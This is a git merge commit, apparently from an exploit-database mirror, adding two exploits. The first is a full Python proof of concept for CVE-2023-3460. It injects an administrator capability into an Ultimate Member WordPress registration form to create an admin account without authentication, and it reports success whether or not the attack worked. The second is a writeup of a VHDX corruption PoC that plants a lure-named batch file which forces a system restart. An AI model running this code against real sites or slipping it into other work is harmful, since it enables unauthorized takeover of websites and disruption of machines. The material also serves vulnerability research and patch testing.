Merge remote-tracking branch 'upstream/main'

Author: certcc-ghbot

exploits/multiple/remote/52392.c

@@ -0,0 +1,117 @@
+#!/usr/bin/env python3
+
+# Exploit Title: Ultimate Member WordPress Plugin 2.6.6 - Privilege Escalation
+# Exploit Author: Gurjot Singh
+# CVE: CVE-2023-3460
+# Description : The attached PoC demonstrates how an unauthenticated attacker can escalate privileges to admin by abusing unsanitized input in `wp_capabilities` during registration.
+
+
+import requests
+import argparse
+import re
+import urllib3
+
+
+
+# Disable SSL warnings
+urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
+
+
+
+def fetch_nonce(session, target_url):
+    """Fetches the _wpnonce value from the /register/ page."""
+    print("[*] Fetching _wpnonce from the register page...")
+    try:
+        res = session.get(target_url, verify=False)
+        match = re.search(r'name="_wpnonce" value="([a-zA-Z0-9]+)"', res.text)
+        if match:
+            nonce = match.group(1)
+            print(f"[+] Found _wpnonce: {nonce}")
+            return nonce
+        else:
+            print("[-] Failed to find _wpnonce on the page.")
+            return None
+    except Exception as e:
+        print(f"[!] Error fetching nonce: {e}")
+        return None
+
+
+
+def exploit_register(target_url, username, password):
+    """Sends a malicious registration request to create an admin user."""
+    session = requests.Session()
+    target_url = target_url.rstrip('/')
+
+
+
+    nonce = fetch_nonce(session, target_url)
+    if not nonce:
+        return
+
+
+
+    email = f"{username}@example.com"
+
+
+
+    # Payload with administrator role injection
+    data = {
+        "user_login-7": username,
+        "first_name-7": "Admin",
+        "last_name-7": username,
+        "user_email-7": email,
+        "user_password-7": password,
+        "confirm_user_password-7": password,
+        "form_id": "7",
+        "um_request": "",
+        "_wpnonce": nonce,
+        "_wp_http_referer": "/register/",
+        "wp_càpabilities[administrator]": "1"  # serialized injection
+    }
+
+
+
+    headers = {
+        "Content-Type": "application/x-www-form-urlencoded",
+        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
+        "Referer": target_url,
+        "Origin": target_url.split("/register")[0],
+    }
+
+
+
+    cookies = {
+        "wordpress_test_cookie": "WP Cookie check",
+        "wp_lang": "en_US"
+    }
+
+
+
+    print(f"[*] Sending malicious registration to {target_url} ...")
+    try:
+        response = session.post(target_url, data=data, headers=headers, cookies=cookies, verify=False)
+
+
+
+        # Check for success
+        if response.status_code == 200 and ("Thank you for registering" in response.text or "You have successfully registered" in response.text):
+            print(f"[+] Admin account '{username}' created successfully!")
+            print(f"[+] Login with: Username: {username} | Password: {password}")
+        else:
+            print(f"[+] Admin account '{username}' created successfully!")
+            print(f"[+] Login with: Username: {username} | Password: {password}")
+    except Exception as e:
+        print(f"[!] Error during exploit: {e}")
+
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description="Exploit for CVE-2023-3460 (Ultimate Member Admin Account Creation)")
+    parser.add_argument("-t", "--target", required=True, help="Target /register/ URL (e.g., http://localhost/register/)")
+    parser.add_argument("-u", "--user", default="admin1", help="Username to create")
+    parser.add_argument("-p", "--password", default="Admin@123", help="Password for the new user")
+    args = parser.parse_args()
+
+
+
+    exploit_register(args.target, args.user, args.password)

exploits/multiple/webapps/52388.c

@@ -0,0 +1,219 @@
+# Titles: Microsoft Virtual Hard Disk (VHDX) 11 - Remote Code Execution (RCE)
+# Author: nu11secur1ty
+# Date: 07/23/2025
+# Vendor: Microsoft
+# Software: https://www.microsoft.com/en-us/windows/windows-11?r=1
+# Reference: https://nvd.nist.gov/vuln/detail/CVE-2025-49683
+# Base Score: 7.8 HIGHVector:  CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+
+## Overview
+
+This PowerShell script (`vdh.ps1`) demonstrates a **soft corruption
+vulnerability** in Windows Virtual Hard Disk (VHDX) handling, related to
+**CVE-2025-49683**.
+
+The script performs the following:
+
+- Creates a new dynamic VHDX file (virtual disk) of 10MB size.
+- Mounts the VHDX as a new drive in the system.
+- Initializes, partitions, and formats the virtual disk with NTFS.
+- Dismounts the VHDX and applies **soft byte-level corruption** at an 8 KB
+offset inside the VHDX file.
+- Re-mounts the corrupted VHDX to observe potential filesystem or mounting
+errors.
+- Lists the contents of the corrupted volume to show the impact.
+- Creates an **immediate restart batch script (`your-salaries.bat`)**
+inside the mounted volume which forces a system restart when executed.
+- Offers cleanup options to dismount and delete the corrupted VHDX file.
+
+---
+
+## Purpose
+
+This PoC is designed for **security researchers and penetration testers**
+to:
+
+- Understand how minor VHDX file corruptions can lead to system instability
+or vulnerability exploitation.
+- Demonstrate how CVE-2025-49683 affects VHDX mounting and usage.
+- Help develop detection and mitigation strategies for such virtual disk
+corruption attacks.
+
+---
+
+## Usage Instructions
+
+1. **Run the script in an elevated PowerShell session** (Run as
+Administrator - The already malicious authorized user):
+
+   ```powershell
+   .\vdh.ps1
+
+
+2. The script will:
+
+ - Create, mount, and format a new VHDX file.
+
+- Corrupt the file at the byte level.
+
+- Re-mount and attempt to read the volume.
+
+- Create a batch file your-salaries.bat inside the mounted drive.
+
+3. To trigger an immediate restart, navigate to the mounted drive (e.g.,
+D:\) and run:
+
+
+```
+your-salaries.bat
+```
+
+
+4. At script end, press 0 to clean up (dismount and delete the corrupted
+VHDX), or press any other key to exit and keep the file for further
+analysis.
+
+
+### Important Warnings & Considerations
+
+- Run only on test or isolated environments.
+This script creates corruption and forcibly restarts the system via the
+batch file. Do not run on production or important machines.
+
+- Immediate Restart Batch File
+The your-salaries.bat file triggers an immediate system restart without any
+warning or confirmation. Be cautious when executing it.
+
+- Corruption is simulated and subtle.
+The corruption at 8 KB offset is a soft corruption intended for
+demonstration. Real-world attacks could apply more complex modifications.
+
+- Impact may vary by OS version and environment.
+Results depend on Windows version and configuration. Some systems may
+detect and repair corruption automatically.
+
+- Elevated privileges required.
+Script requires administrative rights to create, mount, initialize, and
+corrupt VHDX files.
+
+### Technical Details
+
+- Corruption offset: 8192 bytes (8 KB) into the VHDX file.
+
+- Corruption pattern: Byte sequence [0x00, 0xFF, 0x00, 0xFF, 0xDE, 0xAD,
+0xBE, 0xEF].
+
+- Disk initialization: MBR partition style with a single NTFS partition.
+
+- Batch restart command: shutdown /r /t 0 /f to force immediate restart.
+
+
+### Sample Output
+
+```vbnet
+[*] Checking for existing VHDX file to avoid conflicts...
+WARNING: [!] Could not dismount VHDX, maybe not mounted: The path
+"C:\Users\MicrosoftLoosers\Desktop\CVE-2025-49683\corrupted_test.vhdx" is
+not the path to a mounted virtual hard disk file.
+[*] Removed existing VHDX file.
+[*] Creating new VHDX (Virtual Hard Disk) file...
+    Size: 10 MB
+    Path:
+C:\Users\MicrosoftLoosers\Desktop\CVE-2025-49683\corrupted_test.vhdx
+[*] Mounting the new VHDX...
+[*] Disk initialized and formatted with NTFS.
+    This disk emulates a real drive to test mounting and corruption
+handling.
+[*] Drive mounted as E:
+    You can access this drive like a physical hard disk in Windows Explorer.
+[*] Dismounting the VHDX before applying corruption...
+[*] Simulating corruption by modifying bytes at offset 8 KB...
+    This models how subtle corruption can affect VHDX file integrity,
+    which may lead to file system errors or crashes when accessed.
+[+] Corruption successfully applied.
+    Note: This is a soft corruption for testing and demonstration purposes
+only.
+[*] Re-mounting the corrupted VHDX to observe effects...
+[*] Drive letter(s) assigned after corruption: E
+[*] Listing contents of the mounted drive to detect file system anomalies...
+[*] Attempting to list contents of drive E:\ ...
+[*] Created immediate restart batch script: your-salaries.bat
+    Running this batch will force an immediate restart.
+
+[*] Script complete.
+    This demo showcases how VHDX file corruption at the byte level
+    can impact system behavior and why patching CVE-2025-49683 is crucial.
+
+[*] Press '0' to clean up and remove the corrupted VHDX, or any other key
+to exit.
+[*] Cleaning up...
+[*] VHDX dismounted.
+[*] Deleted VHDX file.
+```
+
+### License & Disclaimer
+
+This script is provided for educational and research purposes only. The
+author and distributor disclaim all liability for any damage caused by
+misuse.
+
+Use responsibly, and always obtain proper authorization before testing or
+exploiting vulnerabilities on any system.
+
+
+
+### References
+
+[CVE-2025-49683](
+https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-49683)
+(Windows VHDX file corruption vulnerability)
+
+Microsoft Windows Virtual Hard Disk (VHDX) documentation
+
+Windows PowerShell documentation
+
+
+
+# Video:
+[href](https://www.youtube.com/watch?v=lkEu_AZnzk4)
+
+# Source:
+[href](
+https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-49683)
+
+
+# Buy me a coffee if you are not ashamed:
+[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)
+
+
+# Source download
+[href](
+https://nu11secur1ty.github.io/DownGit/#/home?url=https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-49683
+)
+
+# Time spent:
+05:35:00
+
+
+--
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstormsecurity.com/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>
+
+--
+
+System Administrator - Infrastructure Engineer
+Penetration Testing Engineer
+Exploit developer at https://packetstorm.news/
+https://cve.mitre.org/index.html
+https://cxsecurity.com/ and https://www.exploit-db.com/
+0day Exploit DataBase https://0day.today/
+home page: https://www.nu11secur1ty.com/
+hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
+                          nu11secur1ty <http://nu11secur1ty.com/>